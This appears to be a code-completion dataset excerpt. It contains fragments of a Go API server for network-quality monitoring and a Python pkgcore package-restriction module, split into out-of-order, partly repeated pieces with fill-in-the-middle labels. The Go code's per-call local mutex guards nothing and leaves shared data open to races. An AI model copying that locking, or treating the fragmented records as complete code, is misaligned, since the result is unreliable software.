主要是避免数据多次查询,也是为了报警和和前端查询的结果一致。
*/
func (a *APIServer) retrieveQualityDataAndAnalysisAuto(config *Configuration) {
// init interval ticker
ticker := time.NewTicker(a.queryInterval)
defer ticker.Stop()
//初始化一个分析器
analyzer := NewNetQualityAnalyzer(config.AnalysisConfig, config.AlarmConfig)
analyzer.alarm()
for {
//读取时间
<-ticker.C
go func() {
a.queryData()
analyzer.computePacketLossThreshold(a.qualityDataRaw)
analyzer.eventCheck()
}()
//Check signal channel
select {
case <-a.stopSignal:
a.log.Info("Retrieve will to stop for received interrupt signal.")
return
default:
continue
}
}
}
func (a *APIServer) Stop() { | go func() {
ch := make(chan os.Signal, 1)
signal.Notify(ch,
// kill -SIGINT XXXX 或 Ctrl+c
os.Interrupt,
syscall.SIGINT, // register that too, it should be ok
// os.Kill等同于syscall.Kill
os.Kill,
syscall.SIGKILL, // register that too, it should be ok
// kill -SIGTERM XXXX
syscall.SIGTERM,
)
select {
case <-ch:
a.stopSignal <- struct{}{}
log.Info("Server is shutdown...")
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
_ = a.i.Shutdown(ctx)
}
}()
}
var excludeExtensions = [...]string{
".js",
".css",
".jpg",
".png",
".ico",
".svg",
}
func newRequestLogger(logfile string) (h iris.Handler, close func() error) {
close = func() error { return nil }
c := iris_logger.Config{
Status: true,
IP: true,
Method: true,
Path: true,
Columns: false,
}
logFile, err := openLogFile(logfile)
if err != nil {
panic(err)
}
close = func() error {
return logFile.Close()
}
c.LogFunc = func(now time.Time, latency time.Duration, status, ip, method, path string, message interface{}, headerMessage interface{}) {
output := fmt.Sprintf("%s %s %s %s %s\n", now.Format("2006/01/02 - 15:04:05"), status, ip, method, path)
_, _ = logFile.Write([]byte(output))
}
c.AddSkipper(func(ctx iris.Context) bool {
path := ctx.Path()
for _, ext := range excludeExtensions {
if strings.HasSuffix(path, ext) {
return true
}
}
return false
})
h = iris_logger.New(c)
return
} | random_line_split | |
apiserver.go | package nqas
import (
native_context "context"
"encoding/json"
"fmt"
"github.com/kataras/iris/v12"
iris_logger "github.com/kataras/iris/v12/middleware/logger"
iris_recover "github.com/kataras/iris/v12/middleware/recover"
"local.lc/log"
"net"
"os"
"os/signal"
"runtime/debug"
"strings"
"sync"
"syscall"
"time"
)
type APIServer struct {
//
listener net.Listener
//iris Http Server
i *iris.Application
//配置内容
config APIServerSetting
//记录程序日志,不同于http请求的日志
log *log.Logger
//缓存数据,是经过json序列化过的
qualityDataCache []byte
//原始数据,没有见过序列化
qualityDataRaw []*InternetNetQuality
//缓存时间, 转换成时间戳,方便后续处理
cacheTime int
//查询时间间隔
queryInterval time.Duration
//停止信号
stopSignal chan struct{}
}
func NewAPIServer(config APIServerSetting) (*APIServer, error) {
var err error
api := new(APIServer)
api.config = config
//默认值,需要修改的话从外部修改
api.queryInterval = time.Duration(30 * time.Second)
api.i = iris.New()
iris.RegisterOnInterrupt(func() {
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
// close all hosts
_ = api.i.Shutdown(ctx)
})
cfg := iris.Configuration{}
cfg.DisableBodyConsumptionOnUnmarshal = true
cfg.DisableStartupLog = true
api.i.Configure(iris.WithConfiguration(cfg))
addr := fmt.Sprintf("%s:%s", api.config.Host, api.config.Port)
log.Infof("Listening on %s", addr)
api.listener, err = net.Listen("tcp4", addr)
if err != nil {
log.Error(err)
return nil, err
}
api.i.Use(iris_recover.New())
//api.i.Use(iris_logger.New())
api.i.RegisterView(iris.HTML("./html", ".html"))
return api, nil
}
func (a *APIServer) Run() {
a.Stop()
//设置APIServer自身日志
l, err, closeLogFile := initLogger(a.config.LogFile, "")
if err != nil {
panic(err)
}
defer closeLogFile()
a.log = l
defer func() {
err := recover()
if err != nil {
a.log.Error("API server running error.")
a.log.Errorf("API Server running error: %v", err)
a.log.Errorf("API server running stack info: %s", string(debug.Stack()))
os.Exit(2)
}
}()
//初始化日志记录,只能在此处初始化,否则defer close()将要在函数返回后执行,导致日志文件被关闭
r, _close := newRequestLogger(a.config.AccessLogFile)
defer _close()
a.i.Use(r)
a.log.Info("API Server is starting...")
a.startAPI()
}
func (a *APIServer) startAPI() {
a.registerRoute()
err := a.i.Build()
if err != nil {
a.log.Error(err)
return
}
err = iris.Listener(a.listener)(a.i)
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) registerRoute() {
//Static files
a.i.HandleDir("/css", "./html/css")
a.i.HandleDir("/fonts", "./html/fonts")
a.i.HandleDir("/js", "./html/js")
//Favicon
a.i.Favicon("./html/favicon.ico")
//RootPage
a.i.Get("/", a.rootPageHandler)
//Views
a.i.Get("/netqualitydetail", a.detailPageHandler)
a.i.Get("/netqualitysummary", a.summaryPageHandler)
apiRoutes := a.i.Party("/api")
apiRoutes.Post("/netquality", a.queryQualityDataTotalHandler)
apiRoutes.Post("/netqualitydetail", a.queryQualityDataDetailHandler)
apiRoutes.Post("/netqualitysummary", a.queryQualityDataSummaryHandler)
apiRoutes.Post("/hostquality", a.queryQualityDataByHostHandler)
}
func (a *APIServer) rootPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("index.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) detailPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("detail.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) summaryPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("summary.html")
if err != nil {
a.log.Error(err)
}
}
type TimeStampFilterPayload struct {
TimeStamp int64 `json:"timestamp"`
}
type NetQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*InternetNetQuality `json:"data"`
}
type HostQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*HostQuality `json:"data"`
}
/*
查询最近时刻时刻或者指定时刻的全量数据
*/
func (a *APIServer) queryQualityDataTotalHandler(ctx iris.Context) {
var t TimeStampFilterPayload
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
if t.TimeStamp <= 0 {
_, _ = ctx.Write(a.qualityDataCache)
} else {
data, err := queryNetQualityData(time.Unix(t.TimeStamp, 0), a.config.DataSourceUrl)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
}
type QueryDetailDataFilter struct {
StartTime int64 `json:"starttime"`
EndTime int64 `json:"endtime"`
SrcNetType string `json:"srcnettype"`
DstNetType string `json:"dstnettype"`
SrcLocation string `json:"srclocation"`
DstLocation string `json:"dstlocation"`
}
/*
查询给定条件下,一段时间内的详细数据
*/
func (a *APIServer) queryQualityDataDetailHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
//TODO:可能有bug
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataByTarget(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询给定条件下,查询一段时间的汇总数据
*/
func (a *APIServer) queryQualityDataSummaryHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天,如果开始时间和结束事件相同,查询最近30s内的数据
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataBySource(
startTime,
endTime,
t.SrcNetType,
t.SrcLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询质量探测的目标IP地址和对应的丢包率,只查询最近半分钟的
*/
func (a *APIServer) queryQualityDataByHostHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//只取t.EndTime最近的30s内的数据,如果t.EndTime=0,则查询最新的数据
if t.EndTime <= 0 {
endTime = time.Now()
} else {
endTime = time.Unix(t.EndTime, 0)
}
startTime = endTime.Add(-30 * time.Second)
data, err := queryHostQualityData(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &HostQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &HostQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
func (a *APIServer) queryData() {
t := time.Now()
data, err := queryNetQualityData(t, a.config.DataSourceUrl)
//data, err := queryNetQualityDataMock("./mock_data.json")
var respBody *NetQualityDataResponse
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody = &NetQualityDataResponse{500, errMsg, nil}
} else {
respBody = &NetQuality | a}
}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
l := sync.Mutex{}
l.Lock()
a.qualityDataCache = d
a.qualityDataRaw = data
l.Unlock()
}
/*
周期性查询全量监控数据,然后分析告警。这里相当于把api接口和告警分析结合了起来
主要是避免数据多次查询,也是为了报警和和前端查询的结果一致。
*/
func (a *APIServer) retrieveQualityDataAndAnalysisAuto(config *Configuration) {
// init interval ticker
ticker := time.NewTicker(a.queryInterval)
defer ticker.Stop()
//初始化一个分析器
analyzer := NewNetQualityAnalyzer(config.AnalysisConfig, config.AlarmConfig)
analyzer.alarm()
for {
//读取时间
<-ticker.C
go func() {
a.queryData()
analyzer.computePacketLossThreshold(a.qualityDataRaw)
analyzer.eventCheck()
}()
//Check signal channel
select {
case <-a.stopSignal:
a.log.Info("Retrieve will to stop for received interrupt signal.")
return
default:
continue
}
}
}
func (a *APIServer) Stop() {
go func() {
ch := make(chan os.Signal, 1)
signal.Notify(ch,
// kill -SIGINT XXXX 或 Ctrl+c
os.Interrupt,
syscall.SIGINT, // register that too, it should be ok
// os.Kill等同于syscall.Kill
os.Kill,
syscall.SIGKILL, // register that too, it should be ok
// kill -SIGTERM XXXX
syscall.SIGTERM,
)
select {
case <-ch:
a.stopSignal <- struct{}{}
log.Info("Server is shutdown...")
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
_ = a.i.Shutdown(ctx)
}
}()
}
var excludeExtensions = [...]string{
".js",
".css",
".jpg",
".png",
".ico",
".svg",
}
func newRequestLogger(logfile string) (h iris.Handler, close func() error) {
close = func() error { return nil }
c := iris_logger.Config{
Status: true,
IP: true,
Method: true,
Path: true,
Columns: false,
}
logFile, err := openLogFile(logfile)
if err != nil {
panic(err)
}
close = func() error {
return logFile.Close()
}
c.LogFunc = func(now time.Time, latency time.Duration, status, ip, method, path string, message interface{}, headerMessage interface{}) {
output := fmt.Sprintf("%s %s %s %s %s\n", now.Format("2006/01/02 - 15:04:05"), status, ip, method, path)
_, _ = logFile.Write([]byte(output))
}
c.AddSkipper(func(ctx iris.Context) bool {
path := ctx.Path()
for _, ext := range excludeExtensions {
if strings.HasSuffix(path, ext) {
return true
}
}
return false
})
h = iris_logger.New(c)
return
}
| DataResponse{200, "", dat | conditional_block |
packages.py | """
restriction classes designed for package level matching
"""
from snakeoil import klass
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.klass import generic_equality, static_attrgetter
from ..log import logger
from . import boolean, restriction
class PackageRestriction(restriction.base, metaclass=generic_equality):
"""Package data restriction."""
__slots__ = (
"_pull_attr_func",
"_attr_split",
"restriction",
"ignore_missing",
"negate",
)
__attr_comparison__ = ("__class__", "negate", "_attr_split", "restriction")
__inst_caching__ = True
type = restriction.package_type
subtype = restriction.value_type
conditional = False
# Note a sentinel is used purely because the codepath that use it
# can get executed a *lot*, and setup/tear down of exception
# machinery can be surprisingly costly
# Careful: some methods (__eq__, __hash__, intersect) try to work
# for subclasses too. They will not behave as intended if a
# subclass adds attributes. So if you do that, override the
# methods.
def __init__(self, attr, childrestriction, negate=False, ignore_missing=True):
"""
:param attr: package attribute to match against
:param childrestriction: a :obj:`pkgcore.restrictions.values.base` instance
to pass attr to for matching
:param negate: should the results be negated?
"""
if not childrestriction.type == self.subtype:
raise TypeError("restriction must be of type %r" % (self.subtype,))
sf = object.__setattr__
sf(self, "negate", negate)
self._parse_attr(attr)
sf(self, "restriction", childrestriction)
sf(self, "ignore_missing", ignore_missing)
def _parse_attr(self, attr):
object.__setattr__(self, "_pull_attr_func", static_attrgetter(attr))
object.__setattr__(self, "_attr_split", attr.split("."))
def _pull_attr(self, pkg):
try:
return self._pull_attr_func(pkg)
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split):
raise
return klass.sentinel
def match(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
return self.restriction.match(attr) != self.negate
def _handle_exception(self, pkg, exc, attr_split):
if isinstance(exc, AttributeError):
if not self.ignore_missing:
logger.exception(
"failed getting attribute %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
eargs = [x for x in exc.args if isinstance(x, str)]
if any(x in attr_split for x in eargs):
return False
elif any("'%s'" % x in y for x in attr_split for y in eargs):
# this is fairly horrible; probably specific to cpython also.
# either way, does a lookup specifically for attr components
# in the string exception string, looking for 'attr' in the
# text.
# if it doesn't match, exception is thrown.
return False
logger.exception(
"caught unexpected exception accessing %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
return True
def force_False(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attr, attr)
return self.restriction.force_False(pkg, self.attr, attr)
def force_True(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attr, attr)
return self.restriction.force_True(pkg, self.attr, attr)
def __len__(self):
if not isinstance(self.restriction, boolean.base):
return 1
return len(self.restriction) + 1
def __hash__(self):
return hash((self.negate, self.attrs, self.restriction))
def __str__(self):
s = f"{self.attrs} "
if self.negate:
s += "not "
return s + str(self.restriction)
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r @%#8x>"
return string % (self.__class__.__name__, self.attr, self.restriction, id(self))
@property
def attr(self):
return ".".join(self._attr_split)
@property
def attrs(self):
return (self.attr,)
class PackageRestrictionMulti(PackageRestriction):
__slots__ = ()
__inst_caching__ = True
attr = None
def force_False(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attrs, attrs)
return self.restriction.force_False(pkg, self.attrs, attrs)
def force_True(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attrs, attrs)
return self.restriction.force_True(pkg, self.attrs, attrs)
@property
def attrs(self):
return tuple(".".join(x) for x in self._attr_split)
def _parse_attr(self, attrs):
object.__setattr__(
self, "_pull_attr_func", tuple(map(static_attrgetter, attrs))
)
object.__setattr__(self, "_attr_split", tuple(x.split(".") for x in attrs))
def _pull_attr(self, pkg):
val = []
try:
for attr_func in self._pull_attr_func:
val.append(attr_func(pkg))
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split[len(val)]):
raise
return klass.sentinel
return val
__hash__ = PackageRestriction.__hash__
__eq__ = PackageRestriction.__eq__
class Conditional(PackageRestriction, metaclass=generic_equality):
"""Base object representing a conditional package restriction.
Used to control whether a payload of restrictions are accessible or not.
"""
__slots__ = ("payload",)
__attr_comparison__ = ("__class__", "negate", "attr", "restriction", "payload")
conditional = True
# note that instance caching is turned off.
# rarely pays off for conditionals from a speed/mem comparison
def __init__(self, attr, childrestriction, payload, **kwds):
"""
:param attr: attr to match against
:param childrestriction: restriction to control whether or not the
payload is accessible
:param payload: payload data, whatever it may be.
:param kwds: additional args to pass to :obj:`PackageRestriction`
"""
PackageRestriction.__init__(self, attr, childrestriction, **kwds)
object.__setattr__(self, "payload", tuple(payload))
def __str__(self):
s = PackageRestriction.__str__(self)
payload = ", ".join(str(x) for x in self.payload)
return f"( Conditional: {s} payload: [ {payload} ] )"
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r payload=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r payload=%r @%#8x>"
return string % (
self.__class__.__name__,
self.attr,
self.restriction,
self.payload,
id(self),
)
def __iter__(self):
return iter(self.payload)
def __hash__(self):
return hash((self.attr, self.negate, self.restriction, self.payload))
def evaluate_conditionals(
self, parent_cls, parent_seq, enabled, tristate_locked=None
):
if tristate_locked is not None:
assert len(self.restriction.vals) == 1
val = list(self.restriction.vals)[0]
if val in tristate_locked:
# if val is forced true, but the check is
# negation ignore it
# if !mips != mips
if (val in enabled) == self.restriction.negate:
|
elif not self.restriction.match(enabled):
return
if self.payload:
boolean.AndRestriction(*self.payload).evaluate_conditionals(
parent_cls, parent_seq, enabled, tristate_locked
)
# "Invalid name" (pylint uses the module const regexp, not the class regexp)
# pylint: disable-msg=C0103
AndRestriction = restriction.curry_node_type(
boolean.AndRestriction, restriction.package_type
)
OrRestriction = restriction.curry_node_type(
boolean.OrRestriction, restriction.package_type
)
AlwaysBool = restriction.curry_node_type(
restriction.AlwaysBool, restriction.package_type
)
class KeyedAndRestriction(boolean.AndRestriction):
__inst_caching__ = True
type = restriction.package_type
def __init__(self, *a, **kwds):
key = kwds.pop("key", None)
tag = kwds.pop("tag", None)
boolean.AndRestriction.__init__(self, *a, **kwds)
object.__setattr__(self, "key", key)
object.__setattr__(self, "tag", tag)
def __str__(self):
boolean_str = boolean.AndRestriction.__str__(self)
if self.tag is None:
return boolean_str
return f"{self.tag} {boolean_str}"
AlwaysTrue = AlwaysBool(negate=True)
AlwaysFalse = AlwaysBool(negate=False)
| return | conditional_block |
packages.py | """
restriction classes designed for package level matching
"""
from snakeoil import klass
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.klass import generic_equality, static_attrgetter
from ..log import logger
from . import boolean, restriction
class PackageRestriction(restriction.base, metaclass=generic_equality):
"""Package data restriction."""
__slots__ = (
"_pull_attr_func",
"_attr_split",
"restriction",
"ignore_missing",
"negate",
)
__attr_comparison__ = ("__class__", "negate", "_attr_split", "restriction")
__inst_caching__ = True
type = restriction.package_type
subtype = restriction.value_type
conditional = False
# Note a sentinel is used purely because the codepath that use it
# can get executed a *lot*, and setup/tear down of exception
# machinery can be surprisingly costly
# Careful: some methods (__eq__, __hash__, intersect) try to work
# for subclasses too. They will not behave as intended if a
# subclass adds attributes. So if you do that, override the
# methods.
def __init__(self, attr, childrestriction, negate=False, ignore_missing=True):
"""
:param attr: package attribute to match against
:param childrestriction: a :obj:`pkgcore.restrictions.values.base` instance
to pass attr to for matching
:param negate: should the results be negated?
"""
if not childrestriction.type == self.subtype:
raise TypeError("restriction must be of type %r" % (self.subtype,))
sf = object.__setattr__
sf(self, "negate", negate)
self._parse_attr(attr)
sf(self, "restriction", childrestriction)
sf(self, "ignore_missing", ignore_missing)
def _parse_attr(self, attr):
object.__setattr__(self, "_pull_attr_func", static_attrgetter(attr))
object.__setattr__(self, "_attr_split", attr.split("."))
def _pull_attr(self, pkg):
try:
return self._pull_attr_func(pkg)
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split):
raise
return klass.sentinel
def match(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
return self.restriction.match(attr) != self.negate
def _handle_exception(self, pkg, exc, attr_split):
if isinstance(exc, AttributeError):
if not self.ignore_missing:
logger.exception(
"failed getting attribute %s from %s, " "exception %s",
".".join(attr_split),
str(pkg), | str(exc),
)
eargs = [x for x in exc.args if isinstance(x, str)]
if any(x in attr_split for x in eargs):
return False
elif any("'%s'" % x in y for x in attr_split for y in eargs):
# this is fairly horrible; probably specific to cpython also.
# either way, does a lookup specifically for attr components
# in the string exception string, looking for 'attr' in the
# text.
# if it doesn't match, exception is thrown.
return False
logger.exception(
"caught unexpected exception accessing %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
return True
def force_False(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attr, attr)
return self.restriction.force_False(pkg, self.attr, attr)
def force_True(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attr, attr)
return self.restriction.force_True(pkg, self.attr, attr)
def __len__(self):
if not isinstance(self.restriction, boolean.base):
return 1
return len(self.restriction) + 1
def __hash__(self):
return hash((self.negate, self.attrs, self.restriction))
def __str__(self):
s = f"{self.attrs} "
if self.negate:
s += "not "
return s + str(self.restriction)
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r @%#8x>"
return string % (self.__class__.__name__, self.attr, self.restriction, id(self))
@property
def attr(self):
return ".".join(self._attr_split)
@property
def attrs(self):
return (self.attr,)
class PackageRestrictionMulti(PackageRestriction):
__slots__ = ()
__inst_caching__ = True
attr = None
def force_False(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attrs, attrs)
return self.restriction.force_False(pkg, self.attrs, attrs)
def force_True(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attrs, attrs)
return self.restriction.force_True(pkg, self.attrs, attrs)
@property
def attrs(self):
return tuple(".".join(x) for x in self._attr_split)
def _parse_attr(self, attrs):
object.__setattr__(
self, "_pull_attr_func", tuple(map(static_attrgetter, attrs))
)
object.__setattr__(self, "_attr_split", tuple(x.split(".") for x in attrs))
def _pull_attr(self, pkg):
val = []
try:
for attr_func in self._pull_attr_func:
val.append(attr_func(pkg))
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split[len(val)]):
raise
return klass.sentinel
return val
__hash__ = PackageRestriction.__hash__
__eq__ = PackageRestriction.__eq__
class Conditional(PackageRestriction, metaclass=generic_equality):
"""Base object representing a conditional package restriction.
Used to control whether a payload of restrictions are accessible or not.
"""
__slots__ = ("payload",)
__attr_comparison__ = ("__class__", "negate", "attr", "restriction", "payload")
conditional = True
# note that instance caching is turned off.
# rarely pays off for conditionals from a speed/mem comparison
def __init__(self, attr, childrestriction, payload, **kwds):
"""
:param attr: attr to match against
:param childrestriction: restriction to control whether or not the
payload is accessible
:param payload: payload data, whatever it may be.
:param kwds: additional args to pass to :obj:`PackageRestriction`
"""
PackageRestriction.__init__(self, attr, childrestriction, **kwds)
object.__setattr__(self, "payload", tuple(payload))
def __str__(self):
s = PackageRestriction.__str__(self)
payload = ", ".join(str(x) for x in self.payload)
return f"( Conditional: {s} payload: [ {payload} ] )"
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r payload=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r payload=%r @%#8x>"
return string % (
self.__class__.__name__,
self.attr,
self.restriction,
self.payload,
id(self),
)
def __iter__(self):
return iter(self.payload)
def __hash__(self):
return hash((self.attr, self.negate, self.restriction, self.payload))
def evaluate_conditionals(
self, parent_cls, parent_seq, enabled, tristate_locked=None
):
if tristate_locked is not None:
assert len(self.restriction.vals) == 1
val = list(self.restriction.vals)[0]
if val in tristate_locked:
# if val is forced true, but the check is
# negation ignore it
# if !mips != mips
if (val in enabled) == self.restriction.negate:
return
elif not self.restriction.match(enabled):
return
if self.payload:
boolean.AndRestriction(*self.payload).evaluate_conditionals(
parent_cls, parent_seq, enabled, tristate_locked
)
# "Invalid name" (pylint uses the module const regexp, not the class regexp)
# pylint: disable-msg=C0103
AndRestriction = restriction.curry_node_type(
boolean.AndRestriction, restriction.package_type
)
OrRestriction = restriction.curry_node_type(
boolean.OrRestriction, restriction.package_type
)
AlwaysBool = restriction.curry_node_type(
restriction.AlwaysBool, restriction.package_type
)
class KeyedAndRestriction(boolean.AndRestriction):
__inst_caching__ = True
type = restriction.package_type
def __init__(self, *a, **kwds):
key = kwds.pop("key", None)
tag = kwds.pop("tag", None)
boolean.AndRestriction.__init__(self, *a, **kwds)
object.__setattr__(self, "key", key)
object.__setattr__(self, "tag", tag)
def __str__(self):
boolean_str = boolean.AndRestriction.__str__(self)
if self.tag is None:
return boolean_str
return f"{self.tag} {boolean_str}"
AlwaysTrue = AlwaysBool(negate=True)
AlwaysFalse = AlwaysBool(negate=False) | random_line_split | |
packages.py | """
restriction classes designed for package level matching
"""
from snakeoil import klass
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.klass import generic_equality, static_attrgetter
from ..log import logger
from . import boolean, restriction
class PackageRestriction(restriction.base, metaclass=generic_equality):
"""Package data restriction."""
__slots__ = (
"_pull_attr_func",
"_attr_split",
"restriction",
"ignore_missing",
"negate",
)
__attr_comparison__ = ("__class__", "negate", "_attr_split", "restriction")
__inst_caching__ = True
type = restriction.package_type
subtype = restriction.value_type
conditional = False
# Note a sentinel is used purely because the codepath that use it
# can get executed a *lot*, and setup/tear down of exception
# machinery can be surprisingly costly
# Careful: some methods (__eq__, __hash__, intersect) try to work
# for subclasses too. They will not behave as intended if a
# subclass adds attributes. So if you do that, override the
# methods.
def __init__(self, attr, childrestriction, negate=False, ignore_missing=True):
"""
:param attr: package attribute to match against
:param childrestriction: a :obj:`pkgcore.restrictions.values.base` instance
to pass attr to for matching
:param negate: should the results be negated?
"""
if not childrestriction.type == self.subtype:
raise TypeError("restriction must be of type %r" % (self.subtype,))
sf = object.__setattr__
sf(self, "negate", negate)
self._parse_attr(attr)
sf(self, "restriction", childrestriction)
sf(self, "ignore_missing", ignore_missing)
def _parse_attr(self, attr):
object.__setattr__(self, "_pull_attr_func", static_attrgetter(attr))
object.__setattr__(self, "_attr_split", attr.split("."))
def _pull_attr(self, pkg):
try:
return self._pull_attr_func(pkg)
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split):
raise
return klass.sentinel
def match(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
return self.restriction.match(attr) != self.negate
def _handle_exception(self, pkg, exc, attr_split):
if isinstance(exc, AttributeError):
if not self.ignore_missing:
logger.exception(
"failed getting attribute %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
eargs = [x for x in exc.args if isinstance(x, str)]
